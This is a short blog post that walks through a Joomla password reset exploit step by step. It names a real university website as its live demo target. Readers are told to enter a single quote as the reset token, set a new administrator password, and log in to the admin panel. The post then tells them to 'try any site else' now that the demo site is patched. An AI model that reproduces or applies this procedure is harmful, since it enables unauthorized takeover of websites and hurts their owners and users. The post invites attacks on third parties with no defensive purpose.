Breaking News
recent
Uncategories Joomla Password Reset vulnerability

Joomla Password Reset vulnerability

11:13:00 AM

Joomla Password Reset vulnerability


Section: 
Joomla Password Reset vulnerability : Explain with Live demo : 

website  : http://miit.unikl.edu.my/ 


The tricks is like this:

1. Go to http://miit.unikl.edu.my/index.php?option=
com_user&view=reset&layout=confirm
then you will be prompt for a token in which the token is suppose 
already sent to your email,


2. Now, put a single quote ' into field text box "token" and Click OK.

The sql query then will be looks like this :



"SELECT id FROM jos_users WHERE block = 0 AND activation = '' "

3. Write new password for admin
4. Go to url : http://miit.unikl.edu.my/administrator/
5. Login admin with your new password

** update: miit joomla was patched.. Try any site else :P
Nadim Zobaer

Nadim Zobaer

No comments:

Post a Comment

Thanks for ur comments

Subscribe to: Post Comments (Atom)
Powered by Blogger.